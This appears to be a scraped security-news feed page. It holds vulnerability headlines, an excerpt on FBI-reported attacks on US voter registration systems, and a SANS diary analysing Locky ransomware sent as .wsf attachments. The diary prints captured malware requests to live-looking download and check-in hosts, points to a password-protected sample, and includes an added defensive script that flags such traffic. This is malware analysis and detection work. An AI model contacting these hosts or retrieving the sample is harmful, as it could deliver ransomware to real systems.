[security bulletin] HPSBHF03641 rev.1 - HPE Integrated Lights-Out 3 (iLO 3), Remote Disclosure of Information
 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Linux Kernel CVE-2016-2117 Remote Buffer Overflow Vulnerability
 
Mozilla Firefox Multiple Security Vulnerabilities
 

Sophisticated hackers use the command line with their pinkies raised and wear cashmere balaclavas.

The profile of attacks on two US state voter registration systems this summer presented in an FBI "Flash" memo suggests that the states were hit by a fairly typical sort of intrusion. But an Arizona official said that the Federal Bureau of Investigation had attributed an attack that succeeded only in capturing a single user's login credentials to Russian hackers and rated the threat from the attack as an "eight on a scale of ten" in severity. An Illinois state official characterized the more successful attack on that state's system as "highly sophisticated" based on information from the FBI.

Arizona Secretary of State Office Communications Director Matt Roberts told the Post's Ellen Nakashima that the FBI had alerted Arizona officials in June of an attack by Russians, though the FBI did not state whether they were state-sponsored or criminal hackers. The attack did not gain access to any state or county voter registration system, but the username and password of a single election official was stolen. Roberts did not respond to requests from Ars for clarification on the timeline and other details of the attack.

Based on the details provided by Roberts to the Post, it's not clear if the Arizona incident was one of the two referred to in the FBI "Flash" published this month. The FBI has not responded to questions about the memorandum on the attacks first published publicly by Yahoo News' Michael Isikoff, but a SQL injection attack wouldn't seem to be the likely culprit for stealing a single username and password. It's more likely that the Gila County election official whose credentials were stolen was the victim of a phishing attack or malware.


 
Huawei UMA Multiple Command Injection Vulnerabilities
 
Huawei UMA Security Bypass and Information Disclosure Vulnerabilities
 
Multiple Kaspersky Products Out of Bounds Read Multiple Local Information Disclosure Vulnerabilities
 
LibTIFF Multiple Out of Bounds Memory Corruption Vulnerabilities
 
LibTIFF 'libtiff/tif_next.c' Memory Corruption Vulnerability
 
Multiple Kaspersky Products Local Denial of Service Vulnerabilities
 
Under Secretary of Commerce for Standards and Technology and National Institute of Standards and Technology (NIST) Director Willie E. May has appointed Patricia A. (Patty) Hatter to a four-year term on the NIST Information Security and ...
 
Oracle MySQL CVE-2016-0641 Remote Security Vulnerability
 
Oracle MySQL CVE-2016-0640 Remote Security Vulnerability
 
LibTIFF 'tiffcrop.c' Heap Buffer Overflow Vulnerability
 

Pretty much all the Locky variants I have looked at the last couple of days arrived as zipped JavaScript files. Today, I got something slightly different. While the e-mail looked the same overall, the file was a zipped Windows Script File (.wsf). Overall, this isn't all that different. Windows Script is essentially JavaScript. The only difference is the tag at the beginning of the file.

Today's subject for the e-mail was "Transaction details". Once the user runs the script by double-clicking the file, it will download the actual crypto ransomware.

GET /2tn0o HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
.NET CLR 3.5.30729)
Host: onlybest76.xyz
Connection: Keep-Alive

Just like earlier versions, it then registers the infected system with a website that is only identified by its IP address, so you will not see a DNS lookup for it:

POST /data/info.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://95.85.19.195/data/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
.NET CLR 3.5.30729)
Host: 95.85.19.195
Content-Length: 942
Connection: Keep-Alive

[post data omitted]
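The two requests above share traits a proxy-log or PCAP triage script can key on: the second-stage download is a GET for a short opaque path, and the check-in is a form POST to a Host header that is a bare IP address, so no DNS query precedes it. The following added example (not part of the diary or of any ISC tooling) parses raw HTTP/1.1 request heads and flags those traits. The sample requests are constructed here, modelled on the two captures above with a benign control added; the truncated User-Agent header is not reproduced, and the path regex and tag names are this example's own heuristics.

```python
import ipaddress
import re

# Constructed sample requests modelled on the two captured in the diary
# (header lines split out; the truncated User-Agent header is left out).
# The third request is a benign control.
SAMPLE_REQUESTS = [
    "GET /2tn0o HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Host: onlybest76.xyz\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "POST /data/info.php HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Referer: http://95.85.19.195/data/\r\n"
    "x-requested-with: XMLHttpRequest\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: 95.85.19.195\r\n"
    "Content-Length: 942\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Connection: close\r\n\r\n",
]

# Heuristic (this example's assumption): a short alphanumeric token with no
# extension, like the /2tn0o download path above.
OPAQUE_PATH = re.compile(r"^/[A-Za-z0-9]{4,8}$")


def parse_request(raw):
    """Split a raw HTTP/1.1 request head into method, path and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def is_ip_literal(host):
    """True when the Host header carries an address literal rather than a DNS name."""
    if host.startswith("["):                 # bracketed IPv6 literal, optional :port
        host = host[1:host.find("]")]
    elif host.count(":") == 1:               # name:port or IPv4:port
        host = host.rsplit(":", 1)[0]
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage(raw):
    """Return the list of tags explaining why a request resembles the pattern above."""
    req = parse_request(raw)
    host = req["headers"].get("host", "")
    reasons = []
    if is_ip_literal(host):
        reasons.append("host-is-ip-literal")
        ctype = req["headers"].get("content-type", "")
        if req["method"] == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
            reasons.append("form-post-to-ip-literal")   # check-in style beacon
    if req["method"] == "GET" and OPAQUE_PATH.match(req["path"]):
        reasons.append("short-opaque-download-path")
    return reasons


def triage_all(raws):
    """Map each request path to its triage tags (empty list means nothing flagged)."""
    return {parse_request(r)["path"]: triage(r) for r in raws}


if __name__ == "__main__":
    for path, reasons in triage_all(SAMPLE_REQUESTS).items():
        print(f"{path:16} {'FLAG ' + ','.join(reasons) if reasons else 'ok'}")
```

Neither heuristic is conclusive on its own (plenty of legitimate software talks to IP literals), so the intent is to rank sessions for a human, and to pair the bare-IP rule with the absence of a matching DNS query in the same capture.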

Anti-Malware proves its usual value by doing probably slightly better than a blind chicken in protecting you from this malware. You can download a file with packet capture, mail server logs, and the malware sample here (password: blind chicken).

Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

 
LibTIFF '_TIFFVGetField()' Function Arbitrary Command Execution Vulnerability
 
LibTIFF CVE-2016-3990 Heap Buffer Overflow Vulnerability
 
Linux kernel 'key_reject_and_link()' Function Local Use After Free Denial of Service Vulnerability
 
mDNSResponder CVE-2015-7987 Multiple Buffer Overflow Vulnerabilities
 
Libxml2 'xmlsave.c' Denial of Service Vulnerability
 
MantisBT 'Content Security Policy' Security Bypass Vulnerability
 
Lighttpd 'http_auth.c' Security Bypass Vulnerability
 
NTP CVE-2016-1550 Local Security Bypass Vulnerability
 
NTP CVE-2016-2518 Denial of Service Vulnerability
 
NTP CVE-2015-7978 Denial of Service Vulnerability
 
NTP CVE-2015-7701 Denial of Service Vulnerability
 
[slackware-security] kernel (SSA:2016-242-01)
 
[security bulletin] HPSBGN03638 rev.1 - HPE Remote Device Access: Virtual Customer Access System (vCAS) using lighttpd and OpenSSH, Unauthorized Modification of Information, Remote Denial of Service (DoS), Remote Disclosure of Information
 